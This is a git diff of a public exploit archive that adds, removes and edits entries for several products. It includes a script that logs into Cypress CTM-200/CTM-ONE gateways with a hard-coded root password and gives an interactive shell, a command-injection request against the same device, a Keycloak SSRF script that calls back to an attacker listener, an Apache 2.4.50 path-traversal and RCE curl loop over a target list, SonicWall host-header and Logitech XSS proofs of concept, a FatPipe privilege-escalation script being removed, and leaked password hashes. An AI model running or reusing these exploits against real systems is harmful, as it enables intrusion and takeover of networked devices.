diff --git a/exploits/hardware/remote/50407.py b/exploits/hardware/remote/50407.py new file mode 100755 index 000000000..b0f3c97d8 --- /dev/null +++ b/exploits/hardware/remote/50407.py @@ -0,0 +1,117 @@ +# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH) +# Date: 21.09.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.cypress.bc.ca + +#!/usr/bin/env python3 +# +# +# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH) +# +# +# Vendor: Cypress Solutions Inc. +# Product web page: https://www.cypress.bc.ca +# Affected version: CTM-ONE (1.3.6-latest) +# CTM-ONE (1.3.1) +# CTM-ONE (1.1.9) +# CTM200 (2.7.1.5659-latest) +# CTM200 (2.0.5.3356-184) +# +# Summary: CTM-200 is the industrial cellular wireless gateway for fixed +# and mobile applications. The CTM-200 is a Linux based platform powered +# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard +# features make the CTM-200 ideal for mobile fleet applications or fixed +# site office and SCADA communications. +# +# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and +# fixed applications. CTM-ONE is your next generation of gateway for fleet +# tracking and fixed sites. +# +# ====================================================================== +# CTM-200 +# /var/config/passwd: +# ------------------- +# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash +# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash +# nobody:*:65534:65534:nobody:/var:/bin/false +# daemon:*:65534:65534:daemon:/var:/bin/false +# +# /var/config/advanced.ini: +# ------------------------- +# 0 +# 0 +# Chameleon +# 0,0,0,0,0,255 +# 0,0,0,0,0,255 +# 0,0,0,0,0,255 +# 0,0,0,0,0,255 +# 0,0,0,0,0,255 +# 0,0,0,0,0,255 +# +# +# CTM-ONE +# /etc/shadow: +# ------------ +# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7::: +# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7::: +# daemon:*:16009:0:99999:7::: +# bin:*:16009:0:99999:7::: +# sys:*:16009:0:99999:7::: +# ftp:*:16009:0:99999:7::: +# nobody:*:16009:0:99999:7::: +# messagebus:!:16009:0:99999:7::: +# ====================================================================== +# +# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials +# within their Linux distribution image. This weakness can lead to the +# exposure of resources or functionality to unintended actors, providing +# attackers with sensitive information including executing arbitrary code. +# +# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l) +# GNU/Linux 2.6.32.25 (arm4tl) +# lighttpd/1.4.39 +# BusyBox v1.24.1 +# BusyBox v1.15.3 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2021-5686 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php +# +# +# 21.09.2021 +# + +import sys +import paramiko + +bnr=''' +o ┌─┐┌┬┐┌─┐ ┌─┐ ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬ ┬ o + │ │││││ ┬ ├─┤ ├┬┘│ ││ │ │ └─┐├─┤├┤ │ │ +o └─┘┴ ┴└─┘ ┴ ┴ ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o +''' +print(bnr) + +if len(sys.argv)<2: + print('Put an IP.') + sys.exit() + +adrs=sys.argv[1]## +unme='root'#admin# +pwrd='Chameleon'## + +rsh=paramiko.SSHClient() +rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) +rsh.connect(adrs,username=unme,password=pwrd) + +while 1: + cmnd=input('# ') + if cmnd=='exit': + break + stdin,stdout,stderr=rsh.exec_command(cmnd) + stdin.close() + print(str(stdout.read().decode())) +rsh.close() \ No newline at end of file diff --git a/exploits/hardware/remote/50408.txt b/exploits/hardware/remote/50408.txt new file mode 100644 index 000000000..382dbff66 --- /dev/null +++ b/exploits/hardware/remote/50408.txt @@ -0,0 +1,180 @@ +# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection +# Date: 21.09.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.cypress.bc.ca + +Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection + + +Vendor: Cypress Solutions Inc. +Product web page: https://www.cypress.bc.ca +Affected version: 2.7.1.5659 + 2.0.5.3356-184 + +Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications. +The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor. +Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site +office and SCADA communications. + +Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection +vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user +through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd +upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to +the wget command in /usr/bin/cmdmain ELF binary. + +================================================================================================ +/www/cgi-bin/webif/ctm-config-upgrade.sh: +----------------------------------------- + +136: if ! empty "$FORM_install_fw_url"; then +137: echo "" +138: echo "
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
"
+139:                 cmd upgradefw "$FORM_fw_url"
+140:                 unset FORM_install_fw_url FORM_submit
+141:                 echo "

Done." +142: fi +================================================================== +cmdmain (ELF): + + memset(&DAT_0003bd1c,0,0x80); + make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c); + sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8), + *(undefined4 *)(iParm2 + 8)); + ctmsys(local_184); + sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8)); + iVar3 = ctm_fopen(local_184,"r"); + if (iVar3 == 0) { + uVar5 = *(undefined4 *)(iParm2 + 8); + __s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &"; + goto LAB_0001f4a8; + } + ctm_fclose(); + memset(local_184,0,0x100); + sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8), + *(undefined4 *)(iParm2 + 8)); + ctmsys(local_184); +================================================================= +cmd (ELF): + + while (sVar1 = strlen(__s2), uVar7 < sVar1) { + __s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2); + __s2 = *ppcVar8; + uVar7 = uVar7 + 1; + } + uStack180 = 0x7273752f; + uStack176 = 0x6e69622f; + uStack172 = 0x646d632f; + uStack168 = 0x6d632f73; + uStack164 = 0x69616d64; + uStack160 = 0x6e; + uStack159 = 0; + iVar2 = execv((char *)&uStack180,ppcParm2); +================================================================================================ + +Tested on: GNU/Linux 2.6.32.25 (arm4tl) + BusyBox v1.15.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5687 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php + + +21.09.2021 + +-- + + +PoC POST request: +----------------- + +POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1 +Host: 192.168.1.100 +Connection: keep-alive +Content-Length: 611 +Cache-Control: max-age=0 +Authorization: Basic YWRtaW46Q2hhbWVsZW9u +Upgrade-Insecure-Requests: 1 +Origin: http://192.168.1.1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 +Cookie: style=null +sec-gpc: 1 + +------WebKitFormBoundaryZlABvwQnpLtpe9mM +Content-Disposition: form-data; name="submit" + +1 +------WebKitFormBoundaryZlABvwQnpLtpe9mM +Content-Disposition: form-data; name="upgradefile"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryZlABvwQnpLtpe9mM +Content-Disposition: form-data; name="fw_url" + +`id` +------WebKitFormBoundaryZlABvwQnpLtpe9mM +Content-Disposition: form-data; name="install_fw_url" + +Start Firmware Upgrade from URL +------WebKitFormBoundaryZlABvwQnpLtpe9mM +Content-Disposition: form-data; name="pkgurl" + + +------WebKitFormBoundaryZlABvwQnpLtpe9mM-- + + + +Response: +--------- + +HTTP/1.1 200 OK +Connection: close +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 +Pragma: no-cache + + + +... +... +Firmware Management + +Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway! +Saving configuration ... +downloading firmware image: gid=0(root)/uid=0(root).tar +found image: +extracting image files +Verifying checksum of downloaded firmware image +Image checksum failed +OK + +Done. +... +... + +
+
+ Proceed Changes +
+ +
+ +
+ + + + \ No newline at end of file diff --git a/exploits/hardware/webapps/50341.txt b/exploits/hardware/webapps/50341.txt deleted file mode 100644 index 912ef064d..000000000 --- a/exploits/hardware/webapps/50341.txt +++ /dev/null @@ -1,118 +0,0 @@ -# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) -# Date: 25.07.2021 -# Exploit Author: LiquidWorm -# Vendor Homepage: https://www.fatpipeinc.com - -FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access) - - -Vendor: FatPipe Networks Inc. -Product web page: https://www.fatpipeinc.com -Affected version: WARP / IPVPN / MPVPN - 10.2.2r38 - 10.2.2r25 - 10.2.2r10 - 10.1.2r60p82 - 10.1.2r60p71 - 10.1.2r60p65 - 10.1.2r60p58s1 - 10.1.2r60p58 - 10.1.2r60p55 - 10.1.2r60p45 - 10.1.2r60p35 - 10.1.2r60p32 - 10.1.2r60p13 - 10.1.2r60p10 - 9.1.2r185 - 9.1.2r180p2 - 9.1.2r165 - 9.1.2r164p5 - 9.1.2r164p4 - 9.1.2r164 - 9.1.2r161p26 - 9.1.2r161p20 - 9.1.2r161p17 - 9.1.2r161p16 - 9.1.2r161p12 - 9.1.2r161p3 - 9.1.2r161p2 - 9.1.2r156 - 9.1.2r150 - 9.1.2r144 - 9.1.2r129 - 7.1.2r39 - 6.1.2r70p75-m - 6.1.2r70p45-m - 6.1.2r70p26 - 5.2.0r34 - -Summary: FatPipe Networks invented the concept of router-clustering, -which provides the highest level of reliability, redundancy, and speed -of Internet traffic for Business Continuity and communications. FatPipe -WARP achieves fault tolerance for companies by creating an easy method -of combining two or more Internet connections of any kind over multiple -ISPs. FatPipe utilizes all paths when the lines are up and running, -dynamically balancing traffic over the multiple lines, and intelligently -failing over inbound and outbound IP traffic when ISP services and/or -components fail. - -FatPipe IPVPN balances load and provides reliability among multiple -managed and CPE based VPNs as well as dedicated private networks. FatPipe -IPVPN can also provide you an easy low-cost migration path from private -line, Frame or Point-to-Point networks. You can aggregate multiple private, -MPLS and public networks without additional equipment at the provider's -site. - -FatPipe MPVPN, a patented router clustering device, is an essential part -of Disaster Recovery and Business Continuity Planning for Virtual Private -Network (VPN) connectivity. It makes any VPN up to 900% more secure and -300% times more reliable, redundant and faster. MPVPN can take WANs with -an uptime of 99.5% or less and make them 99.999988% or higher, providing -a virtually infallible WAN. MPVPN dynamically balances load over multiple -lines and ISPs without the need for BGP programming. MPVPN aggregates up -to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed -you need to keep your VPN up and running despite failures of service, line, -software, or hardware. - -Desc: The application has a hidden administrative account 'cmuser' that has -no password and has write access permissions to the device. The user cmuser -is not visible in Users menu list of the application. - -Tested on: Apache-Coyote/1.1 - - -Vulnerability discovered by Gjoko 'LiquidWorm' Krstic - @zeroscience - - -Advisory ID: ZSL-2021-5684 -Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php - - -30.05.2016 -25.07.2021 - --- - - -Overview: -FatPipe Central Manager is a secure web based solution providing a centralized solution -to manage FatPipe's suite of WAN reliability and optimization products. Central Manager -allows you to configure, manage and monitor FatPipe's patented MPSec technology at the -click of a button. - -Central Manager = cmuser. -Once authenticated, you get admin rights. - -HTTP/1.1 200 OK -Server: Apache-Coyote/1.1 -Strict-Transport-Security: max-age=31536000 -X-Frame-Options: DENY -X-Content-Type-Options: nosniff -X-XSS-Protection: 1; mode=block -Content-Type: application/json;charset=ISO-8859-1 -Content-Length: 118 -Date: Fri, 06 Aug 2017 16:37:07 GMT -Connection: close - -{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"} \ No newline at end of file diff --git a/exploits/hardware/webapps/50342.py b/exploits/hardware/webapps/50342.py deleted file mode 100755 index 0e82e9247..000000000 --- a/exploits/hardware/webapps/50342.py +++ /dev/null @@ -1,191 +0,0 @@ -# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation -# Date: 25.07.2021 -# Exploit Author: LiquidWorm -# Vendor Homepage: https://www.fatpipeinc.com - -#!/usr/bin/env python3 -# -# -# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation -# -# -# Vendor: FatPipe Networks Inc. -# Product web page: https://www.fatpipeinc.com -# Affected version: WARP / IPVPN / MPVPN -# 10.2.2r38 -# 10.2.2r25 -# 10.2.2r10 -# 10.1.2r60p82 -# 10.1.2r60p71 -# 10.1.2r60p65 -# 10.1.2r60p58s1 -# 10.1.2r60p58 -# 10.1.2r60p55 -# 10.1.2r60p45 -# 10.1.2r60p35 -# 10.1.2r60p32 -# 10.1.2r60p13 -# 10.1.2r60p10 -# 9.1.2r185 -# 9.1.2r180p2 -# 9.1.2r165 -# 9.1.2r164p5 -# 9.1.2r164p4 -# 9.1.2r164 -# 9.1.2r161p26 -# 9.1.2r161p20 -# 9.1.2r161p17 -# 9.1.2r161p16 -# 9.1.2r161p12 -# 9.1.2r161p3 -# 9.1.2r161p2 -# 9.1.2r156 -# 9.1.2r150 -# 9.1.2r144 -# 9.1.2r129 -# 7.1.2r39 -# 6.1.2r70p75-m -# 6.1.2r70p45-m -# 6.1.2r70p26 -# 5.2.0r34 -# -# Summary: FatPipe Networks invented the concept of router-clustering, -# which provides the highest level of reliability, redundancy, and speed -# of Internet traffic for Business Continuity and communications. FatPipe -# WARP achieves fault tolerance for companies by creating an easy method -# of combining two or more Internet connections of any kind over multiple -# ISPs. FatPipe utilizes all paths when the lines are up and running, -# dynamically balancing traffic over the multiple lines, and intelligently -# failing over inbound and outbound IP traffic when ISP services and/or -# components fail. -# -# FatPipe IPVPN balances load and provides reliability among multiple -# managed and CPE based VPNs as well as dedicated private networks. FatPipe -# IPVPN can also provide you an easy low-cost migration path from private -# line, Frame or Point-to-Point networks. You can aggregate multiple private, -# MPLS and public networks without additional equipment at the provider's -# site. -# -# FatPipe MPVPN, a patented router clustering device, is an essential part -# of Disaster Recovery and Business Continuity Planning for Virtual Private -# Network (VPN) connectivity. It makes any VPN up to 900% more secure and -# 300% times more reliable, redundant and faster. MPVPN can take WANs with -# an uptime of 99.5% or less and make them 99.999988% or higher, providing -# a virtually infallible WAN. MPVPN dynamically balances load over multiple -# lines and ISPs without the need for BGP programming. MPVPN aggregates up -# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed -# you need to keep your VPN up and running despite failures of service, line, -# software, or hardware. -# -# Desc: The application suffers from a privilege escalation vulnerability. -# A normal user (group USER, 0) can elevate her privileges by sending a HTTP -# POST request and setting the JSON parameter 'privilege' to integer value -# '1' gaining administrative rights (group ADMINISTRATOR, 1). -# -# Tested on: Apache-Coyote/1.1 -# -# -# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic -# @zeroscience -# -# -# Advisory ID: ZSL-2021-5685 -# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php -# -# -# 30.05.2016 -# 25.07.2021 -# -# - -import sys -import time####### -import requests################ -requests.packages.urllib3.disable_warnings() - -if len(sys.argv) !=2: - print - print("********************************************************") - print("* *") - print("* Privilege escalation from USER to ADMINISTRATOR role *") - print("* in *") - print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *") - print("* *") - print("* ZSL-2021-5685 *") - print("* *") - print("********************************************************") - print("\n[POR] Usage: ./escalator.py [IP]") - sys.exit() - -ajpi=sys.argv[1] -print -juzer=raw_input("[UNE] Username: ") -pasvord=raw_input("[UNE] Password: ") - -sesija=requests.session() -logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'} - -hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"', - 'Accept' :'application/json, text/javascript, */*; q=0.01', - 'X-Requested-With':'XMLHttpRequest', - 'Sec-Ch-Ua-Mobile':'?0', - 'User-Agent' :'Fatnet/1.b', - 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8', - 'Origin' :'https://'+ajpi, - 'Sec-Fetch-Site' :'same-origin', - 'Sec-Fetch-Mode' :'cors', - 'Sec-Fetch-Dest' :'empty', - 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet', - 'Accept-Encoding' :'gzip, deflate', - 'Accept-Language' :'en-US,en;q=0.9', - 'Connection' :'close'} - -juarel1='https://'+ajpi+'/fpui/loginServlet' -alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False) - -if not 'success' in alo.text: - print('[GRE] Login error.') - sys.exit() -else: - print('[POR] Authentication successful.') - -print('[POR] Climbing the ladder...') - -sluba=''' -|| || .--._ -||====|| __ '---._) -|| ||"")\ Q Q ) -||====|| =_/ o / -|| || | \_.-;-'-,._ -||====|| | ' o---o ) -|| || \ /H __H\ / -||====|| '-' \"")\/ | -|| || _ |_='-)_/ -||====|| / '. ) -|| || / / -||====|| |___/\| / -|| || |_| | | -||====|| / ) \\ \\ -|| || (__/ \___\\ -||====|| \_\\ -|| || / ) -||====|| (__/ -''' - -for k in sluba: - sys.stdout.write(k) - sys.stdout.flush() - time.sleep(0.01) - -juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest' -posta={ -'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' -} -stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False) - -if not 'true' in stanje.text: - print('\n[GRE] Something\'s fishy!') - sys.exit() -else: - print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.') - sys.exit() \ No newline at end of file diff --git a/exploits/hardware/webapps/50414.txt b/exploits/hardware/webapps/50414.txt new file mode 100644 index 000000000..17b306ab8 --- /dev/null +++ b/exploits/hardware/webapps/50414.txt @@ -0,0 +1,228 @@ +# Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection +# Google Dork: inurl:"auth.html" intitle:"SonicWall" +# intitle:"SonicWall Analyzer Login" +# Discovered Date: 03/09/2020 +# Reported Date: 07/09/2020 +# Exploit Author: Ramikan +# Vendor Homepage:sonicwall.com +# Affected Devices: All SonicWall Next Gen 6 Devices +# Tested On: SonicWall NAS 6.2.5 +# Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3 +# Fixed Version:Gen6 firmware 6.5.4.8-89n +# CVE : CVE-2021-20031 +# CVSS v3:5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) +# Category:Hardware, Web Apps +# Reference : https://github.com/Ramikan/Vulnerabilities/ + +************************************************************************************************************************************* + +Vulnerability 1: Host Header Injection + +************************************************************************************************************************************* +Description: +A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. +An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack + +Impact: +Host Header changed to different domain (fakedomain.com). +Fakedomain.com can be found in two lines in the HTTP response, below are the two lines. + +var jumpURL = "https://fakedomain.com/auth.html"; +ease be patient as you are being re-directed to a secure login page + +************************************************************************************************************************************* +Normal Request +************************************************************************************************************************************* +GET / HTTP/1.1 +Host: 192.168.10.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +************************************************************************************************************************************* +Normal Response +************************************************************************************************************************************* +HTTP/1.0 200 OK +Server: SonicWALL +Expires: -1 +Cache-Control: no-cache +Content-type: text/html; charset=UTF-8; +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: SAMEORIGIN +Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com; + + + +++++++++++++++++++snipped+++++++++++++++++++++++ + + + +
+
+
+ + +
+ +
+
+
+ + + + +************************************************************************************************************************************* +POC +************************************************************************************************************************************* + +Host Header changed to different domain (fakedomain.com). +Fakedomain.com can be found in two lines in the response, below are the two lines. + +var jumpURL = "https://fakedomain.com/auth.html"; +ease be patient as you are being re-directed to a secure login page + +************************************************************************************************************************************* +Request: +************************************************************************************************************************************* +GET / HTTP/1.1 +Host: fakedomain.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Upgrade-Insecure-Requests: 1 +Connection: close +Cookie: temp= + +************************************************************************************************************************************* +Response: +************************************************************************************************************************************* + +HTTP/1.0 200 OK +Server: SonicWALL +Expires: -1 +Cache-Control: no-cache +Content-type: text/html; charset=UTF-8; +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: SAMEORIGIN +Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com; + + + + + + +Document Moved + + + + + + + +
+
+
+ + +
+ +
+
+
+ + + + + +The redirection is happening to https://fakedomain.com/auth.html. + +************************************************************************************************************************************* +Attack Vector: +************************************************************************************************************************************* +Can be used for domain fronting. + +curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device" + + +************************************************************************************************************************************* +Vendor Response: +************************************************************************************************************************************* +Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) - fix is provided with a CLI option > configure > administration > enforce-http-host-check, to avoid Host header redirection. +Workaround: Please disable port 80 to mitigate it and this issue affected all Gen6 firewall products. + +https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019 +************************************************************************************************************************************* \ No newline at end of file diff --git a/exploits/java/webapps/50405.py b/exploits/java/webapps/50405.py new file mode 100755 index 000000000..fe3cf6009 --- /dev/null +++ b/exploits/java/webapps/50405.py @@ -0,0 +1,52 @@ +# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) +# Date: 2021-10-09 +# Exploit Author: Mayank Deshmukh +# Vendor Homepage: https://www.keycloak.org/ +# Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html +# Version: versions < 12.0.2 +# Tested on: Kali Linux +# CVE : CVE-2020-10770 + +#!/usr/bin/env python3 + +import argparse, textwrap +import requests +import sys + +parser = argparse.ArgumentParser(description="-=[Keycloak Blind SSRF test by ColdFusionX]=-", formatter_class=argparse.RawTextHelpFormatter, +epilog=textwrap.dedent(''' +Exploit Usage : +./exploit.py -u http://127.0.0.1:8080 +[^] Input Netcat host:port -> 192.168.0.1:4444 +''')) + +parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)") +args = parser.parse_args() + +if len(sys.argv) <= 2: + print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") + sys.exit() + +# Variables +Host = args.url + +r = requests.session() + +def ssrf(): + headerscontent = { + 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', + } + hook = input("[^] Input Netcat host:port -> ") + + _req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent) + return True + +if __name__ == "__main__": + + print ('\n[+] Keycloak Bind SSRF test by ColdFusionX \n ') + try: + if ssrf() == True: + print ('\n[+] BINGO! Check Netcat listener for HTTP callback :) \n ') + + except Exception as ex: + print('\n[-] Invalid URL or Target not Vulnerable') \ No newline at end of file diff --git a/exploits/jsp/webapps/47179.py b/exploits/jsp/webapps/47179.py index 6166f4754..4ae51ea0c 100755 --- a/exploits/jsp/webapps/47179.py +++ b/exploits/jsp/webapps/47179.py @@ -1,4 +1,4 @@ -# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (POC) +# Exploit Title: Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated) # Date: 26-6-2019 # Exploit Author: Wietse Boonstra # Vendor Homepage: https://ahsay.com @@ -7,23 +7,10 @@ # Tested on: Windows / Linux # CVE : CVE-2019-10267 +# Session cookies are reflected in the JavaScript url: #!/usr/bin/env python3 -""" -# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. -# Date: 26-6-2019 -# Exploit Author: Wietse Boonstra -# Vendor Homepage: https://ahsay.com -# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe -# Version: 7.x < 8.1.1.50 -# Tested on: Windows / Linux -# CVE : CVE-2019-10267 - -Session cookies are reflected in the JavaScript url: - -""" - import urllib3 import argparse import base64 @@ -412,7 +399,7 @@ if __name__ == "__main__": url = url.rstrip('/') username = args.username password = args.password - e = Exploit(url,username,password,"http://localhost:8080") + e = Exploit(url,username,password) #Include proxy option inside brackets if required -> "http://localhost:8080" if args.check: e.checkTrialAccount() elif args.add: diff --git a/exploits/multiple/webapps/50383.sh b/exploits/multiple/webapps/50383.sh index 6c233d6fd..46f7505fc 100755 --- a/exploits/multiple/webapps/50383.sh +++ b/exploits/multiple/webapps/50383.sh @@ -16,7 +16,7 @@ exit fi for host in $(cat $1); do echo $host -curl --proxy http://192.168.72.1:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done # PoC.sh targets.txt /etc/passwd # PoC.sh targets.txt /bin/sh whoami \ No newline at end of file diff --git a/exploits/multiple/webapps/50406.sh b/exploits/multiple/webapps/50406.sh new file mode 100755 index 000000000..a0034d419 --- /dev/null +++ b/exploits/multiple/webapps/50406.sh @@ -0,0 +1,24 @@ +# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) +# Date: 10/05/2021 +# Exploit Author: Lucas Souza https://lsass.io +# Vendor Homepage: https://apache.org/ +# Version: 2.4.50 +# Tested on: 2.4.50 +# CVE : CVE-2021-42013 +# Credits: Ash Daulton and the cPanel Security Team + +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +echo ./PoC.sh targets.txt /bin/sh id + +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done + +# PoC.sh targets.txt /etc/passwd +# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file diff --git a/exploits/multiple/webapps/50413.txt b/exploits/multiple/webapps/50413.txt new file mode 100644 index 000000000..43eee3f02 --- /dev/null +++ b/exploits/multiple/webapps/50413.txt @@ -0,0 +1,14 @@ +# Exploit Title: Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS) +# Shodan Dork: Search Logitech Media Server +# Date: 12.10.2021 +# Exploit Author: Mert Das +# Vendor Homepage: www.logitech.com +# Version: 8.2.0 +# Tested on: Windows 10, Linux + +POC: + +1. Go to Settings / Interface tab +2. Add payload to Title section +3. Payload : "> +4. Alert will popup \ No newline at end of file diff --git 